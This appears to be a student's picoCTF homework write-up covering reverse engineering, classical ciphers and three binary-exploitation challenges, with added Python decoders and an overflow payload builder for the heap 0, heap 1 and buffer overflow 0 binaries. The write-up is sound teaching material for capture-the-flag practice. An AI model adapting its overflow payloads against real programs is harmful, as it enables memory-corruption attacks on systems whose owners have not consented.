Cornell Cyber NME HW 3 - Fall 2024
This week's homework included solving a selection of the following picoCTF challenges.
vault-door-training [Reverse Engineering]
The flag is in the given source code. DO NOT hardcode secrets in your code.
Transformation [Reverse Engineering]
The source code that produced the encoded string is given, so reversing it by hand is straightforward (each 16-bit character of the output packs two ASCII bytes of the flag, high byte first), but given the easy difficulty and the hint to use online decoders that seemed out of scope. I used CyberChef's Magic feature in intensive mode with the crib picoCTF and was given the flag.
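For readers who would rather reverse the encoding than lean on CyberChef, the following is an added example (my code, not part of the original writeup or the challenge files). It re-implements the challenge's one-line encoder, `chr((ord(flag[i]) << 8) + ord(flag[i + 1]))` over byte pairs, and the matching decoder; the sample flag is constructed, and the `decode_file` helper assumes the encoded text is a UTF-8 file.

```python
# Added example: decoder for the Transformation challenge.
# The challenge's encoder packs two ASCII bytes into one 16-bit code point:
#   chr((ord(flag[i]) << 8) + ord(flag[i + 1]))   for i = 0, 2, 4, ...
# Both directions are implemented here so the round trip can be checked.

def transformation_encode(flag: str) -> str:
    """Pack consecutive byte pairs into one code point each (the challenge's encoding).
    Rejects odd-length input, which the original one-liner would crash on."""
    if len(flag) % 2:
        raise ValueError("encoder needs an even number of characters")
    return "".join(chr((ord(flag[i]) << 8) + ord(flag[i + 1]))
                   for i in range(0, len(flag), 2))

def transformation_decode(enc: str) -> str:
    """Undo the packing: emit the high byte, then the low byte, of every code point."""
    out = []
    for ch in enc:
        cp = ord(ch)
        if cp > 0xFFFF:
            # Python code points go up to 0x10FFFF; anything wider than 16 bits
            # cannot have come from this encoder.
            raise ValueError(f"code point {cp:#x} is wider than 16 bits; not this encoding")
        out.append(chr(cp >> 8))
        out.append(chr(cp & 0xFF))
    return "".join(out)

def decode_file(path: str) -> str:
    """Read the challenge's enc file (assumed UTF-8 text) and decode it.
    Only a trailing newline is removed: a generic strip() could eat a code point
    such as U+2028 that decodes to a real pair of flag bytes."""
    with open(path, encoding="utf-8") as f:
        return transformation_decode(f.read().rstrip("\n"))

# Constructed sample flag, not the real one.
SAMPLE_FLAG = "picoCTF{constructed_example_0}"

if __name__ == "__main__":
    packed = transformation_encode(SAMPLE_FLAG)
    print(packed)
    print(transformation_decode(packed))
```

Run it against the real file with `decode_file("enc")`; the decoder only cares that each character fits in 16 bits, so it also flags input that was not produced by this encoder instead of silently emitting garbage.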
file-run1 [Reverse Engineering]
The description tells us to run this file from the command line, but how do we do that? Typing just the name of the file does not work, because the current directory is not on PATH. To run a file like this you instead have to do
```console
./<file-name>
```
This won't work right away either, because the file does not have execute permissions, which can be confirmed by the lack of an x in the mode column when you run
```console
ls -l
```
To add execute permissions, run
```console
chmod +x run
```
run should now have the permissions -rwxr-xr-x and can be executed. This is a good time to warn you that adding execute permissions to files you do not completely trust is a bad idea; there is a reason downloaded files are not executable by default. With that in mind, running ./run should now give you the flag.
Mod 26 [Cryptography]
This is just a standard ROT13 cipher (a Caesar shift of 13, which is its own inverse). CyberChef is a good bet as always.
Vigenere [Cryptography]
A Vigenère cipher works by adding each letter of the key to the corresponding letter of the plaintext (mod 26), repeating the key once it is exhausted; decryption subtracts the key letter instead. CyberChef can do this.
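The following is an added example (my code, not from the writeup or CyberChef) covering both Mod 26 and this challenge: a Vigenère encrypt/decrypt routine, with ROT13 expressed as Vigenère under the one-letter key "N" (shift 13). It assumes CyberChef's default convention, which is also the usual one: only A-Z/a-z are shifted, case is preserved, and non-letters pass through without advancing the key. The test vectors are constructed, not the challenge's ciphertext.

```python
# Added example: Vigenère and shift ciphers (Mod 26, Vigenere).
# Convention assumed: only ASCII letters are shifted, case is kept, and any other
# character is copied through without consuming a key letter.

def _is_letter(ch: str) -> bool:
    return ("a" <= ch <= "z") or ("A" <= ch <= "Z")

def _shift_letter(ch: str, amount: int) -> str:
    """Rotate one ASCII letter by `amount` positions (negative to undo)."""
    base = ord("a") if ch.islower() else ord("A")
    return chr(base + (ord(ch) - base + amount) % 26)

def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Repeating-key shift: each letter is shifted by its key letter (A=0 .. Z=25)."""
    shifts = [ord(k.upper()) - ord("A") for k in key if _is_letter(k)]
    if not shifts:
        raise ValueError("key must contain at least one letter")
    out, i = [], 0
    for ch in text:
        if _is_letter(ch):
            s = shifts[i % len(shifts)]
            out.append(_shift_letter(ch, -s if decrypt else s))
            i += 1            # the key only advances on letters
        else:
            out.append(ch)
    return "".join(out)

def caesar(text: str, shift: int) -> str:
    """Mod 26 in general: a fixed shift is Vigenère with a one-letter key."""
    return vigenere(text, chr(ord("A") + shift % 26))

def rot13(text: str) -> str:
    """Shift by 13 is self-inverse: applying it twice returns the input."""
    return caesar(text, 13)

def all_shifts(text: str) -> list:
    """Brute force for Mod 26 when the shift is unknown: all 26 candidates."""
    return [caesar(text, s) for s in range(26)]

if __name__ == "__main__":
    print(vigenere("ATTACKATDAWN", "LEMON"))                  # constructed vector
    print(vigenere("LXFOPVEFRNHR", "LEMON", decrypt=True))
    print(rot13("picoCTF{constructed}"))
```

`all_shifts` is the check to run when a Mod 26 challenge does not actually use 13: look for the one candidate that starts with picoCTF.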
transposition-trial [Cryptography]
Start by breaking the message into groups of three. Notice that the first word 'The' arrives as 'heT': its first letter has ended up in position 3, its second in position 1 and its third in position 2. Apply the same permutation to every group of three to unscramble the rest of the message.
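The following is an added example (my code, not from the writeup) that automates the pattern above and generalises it to any block size: derive the permutation from a known crib such as 'heT' -> 'The', then apply it to every block. The plaintext and ciphertext in the test are constructed rather than the challenge's own.

```python
# Added example: block transposition (transposition-trial).
# perm[i] is the index inside a ciphertext block where plaintext position i sits.
# For this challenge the crib "heT" -> "The" gives perm = [2, 0, 1].

def derive_permutation(cipher_block: str, plain_block: str) -> list:
    """Recover perm from one known block. Refuses cribs with repeated characters,
    since those would make the mapping ambiguous."""
    if len(cipher_block) != len(plain_block):
        raise ValueError("crib blocks must have equal length")
    if len(set(cipher_block)) != len(cipher_block):
        raise ValueError("crib has repeated characters; permutation is ambiguous")
    return [cipher_block.index(c) for c in plain_block]

def _check_perm(perm: list) -> None:
    if sorted(perm) != list(range(len(perm))):
        raise ValueError(f"{perm} is not a permutation of 0..{len(perm) - 1}")

def unscramble(ciphertext: str, perm: list) -> str:
    """Apply perm to every full block; a trailing partial block is left untouched."""
    _check_perm(perm)
    n, out = len(perm), []
    for start in range(0, len(ciphertext), n):
        block = ciphertext[start:start + n]
        out.append(block if len(block) < n else "".join(block[j] for j in perm))
    return "".join(out)

def scramble(plaintext: str, perm: list) -> str:
    """Inverse of unscramble, useful for building test vectors."""
    _check_perm(perm)
    n, out = len(perm), []
    for start in range(0, len(plaintext), n):
        block = plaintext[start:start + n]
        if len(block) < n:
            out.append(block)
        else:
            c = [""] * n
            for i, j in enumerate(perm):
                c[j] = block[i]
            out.append("".join(c))
    return "".join(out)

if __name__ == "__main__":
    perm = derive_permutation("heT", "The")
    sample = scramble("The flag is in here", perm)       # constructed ciphertext
    print(perm, sample, unscramble(sample, perm), sep="\n")
```

If the message length is not a multiple of the block size, the leftover characters are kept as they are; check them by hand, since the challenge may pad or simply stop mid-block.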
heap 0 [Binary Exploitation]
The first thing I tried was simply connecting to the instance. It offers a few options, notably the ability to write to a buffer, which suggests a buffer overflow. Checking the source code, the win condition is that the second buffer, safe_var, no longer contains "bico". Subtracting the two heap addresses the program prints shows that the buffers are 32 bytes (0x20) apart. A char is a single byte, so writing 32 or more characters into the first buffer overflows it and spills into the second (exactly 32 already works, since the terminating NUL of the copied string lands on the first byte of safe_var). After writing a suitably large string, the second buffer has changed, the win condition holds and the print flag option gives the flag.
heap 1 [Binary Exploitation]
The exploit here is the same as in heap 0; the only difference is that the win condition now requires safe_var to equal "pico". This needs a slightly more careful input: 32 characters of filler followed by 'pico' (the string copy adds the terminating NUL for us). That satisfies the win condition and the flag can now be printed.
buffer overflow 0 [Binary Exploitation]
For this challenge we again need to perform a buffer overflow, but this time it is on the stack and the program prints no addresses, so the layout has to be read from the source code. There, buf1 is declared with size 100 and buf2 with size 16, and buf1 is later copied into buf2 with strcpy, which performs no length check. Any input longer than 16 characters therefore overflows buf2; a large input such as one of length 116 runs far past its end, the program crashes with a segmentation fault, and the SIGSEGV handler the program installs prints the flag.
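The following is an added example (my code, not from the writeup or the challenge) that turns the three binary-exploitation solutions above into a small payload builder: it reads the two chunk addresses heap 0 and heap 1 print, computes the overflow offset, and emits the filler-plus-value input; the same helper builds the oversized input for buffer overflow 0. The sample program output is constructed and its exact format is an assumption (the parser only relies on the first two 0x... tokens appearing in buffer order). It also enforces the caveat that bites in practice: because the programs read input as a C string, a payload containing a NUL or newline byte is cut short before it reaches the target.

```python
# Added example: overflow payload construction for heap 0, heap 1 and buffer overflow 0.
import re

HEX = re.compile(r"0x[0-9a-fA-F]+")

def overflow_offset(program_output: str) -> int:
    """Distance from the start of the input buffer to the start of safe_var,
    taken from the first two hex addresses the program prints (assumed order:
    input buffer first, safe_var second)."""
    addrs = [int(m, 16) for m in HEX.findall(program_output)]
    if len(addrs) < 2:
        raise ValueError("expected at least two addresses in program output")
    src, dst = addrs[0], addrs[1]
    if dst <= src:
        raise ValueError("target buffer is not after the input buffer; overflow cannot reach it")
    return dst - src

def overflow_payload(offset: int, value: bytes = b"", filler: bytes = b"A") -> bytes:
    """filler * offset followed by the bytes that should land in the target buffer.
    Rejects NUL and newline, which scanf/gets/strcpy treat as the end of input."""
    payload = filler * offset + value
    if b"\x00" in payload or b"\n" in payload:
        raise ValueError("payload contains NUL or newline and would be truncated")
    return payload

# Constructed sample of the heap state the heap 0 / heap 1 binaries print
# (format assumed; addresses invented).
SAMPLE_OUTPUT = """\
[*]   0x55a4e2a6b2a0  ->   pico
[*]   0x55a4e2a6b2c0  ->   bico
"""

def heap0_payload(output: str) -> bytes:
    """heap 0 win: safe_var != "bico". One byte past the offset is enough;
    even an empty value would do, since the copy's NUL terminator changes it."""
    return overflow_payload(overflow_offset(output), b"X")

def heap1_payload(output: str) -> bytes:
    """heap 1 win: safe_var == "pico". The copy appends the NUL after 'pico'."""
    return overflow_payload(overflow_offset(output), b"pico")

def bof0_payload(buf2_size: int = 16, extra: int = 100) -> bytes:
    """buffer overflow 0: no addresses to parse; anything well past buf2's
    16 bytes overruns the stack frame and triggers the crash that wins."""
    return overflow_payload(buf2_size + extra)

if __name__ == "__main__":
    print(overflow_offset(SAMPLE_OUTPUT))          # 32
    print(heap1_payload(SAMPLE_OUTPUT))
    print(len(bof0_payload()))
```

Pipe the bytes into the program (or pass them to the menu option) exactly as produced; adding a trailing newline yourself is fine, since it only terminates the read after the whole payload has been delivered.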